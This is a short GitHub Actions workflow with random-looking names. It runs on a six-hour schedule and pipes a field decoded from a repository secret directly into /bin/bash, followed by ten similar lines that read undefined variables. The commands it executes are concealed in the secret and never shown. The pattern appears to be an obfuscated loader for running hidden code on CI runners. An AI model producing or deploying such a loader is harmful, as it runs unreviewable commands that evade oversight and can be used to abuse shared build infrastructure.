name: jiangjing19871010

on:
  workflow_dispatch:
  schedule:
    - cron: '11 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: jiangjing19871010
        env:
          ydcpb1: ${{ secrets.ydcpb1 }}
        run: |
          echo $ydcpb1 | jq -r .lqzl1566 | /bin/bash
          echo $jdlua40354 | jq -r .tb153 | /bin/bash
          echo $fwqsu41 | jq -r .lu70 | /bin/bash
          echo $zvpew771 | jq -r .hg4129 | /bin/bash
          echo $rf80 | jq -r .lc4 | /bin/bash
          echo $adwna81 | jq -r .pgw156 | /bin/bash
          echo $fedbp24 | jq -r .hpf26 | /bin/bash
          echo $nl67826 | jq -r .ufvzq567 | /bin/bash
          echo $j88967 | jq -r .jn27 | /bin/bash
          echo $epjf96011 | jq -r .egl0 | /bin/bash
          echo $bua172 | jq -r .jwfg93105 | /bin/bash

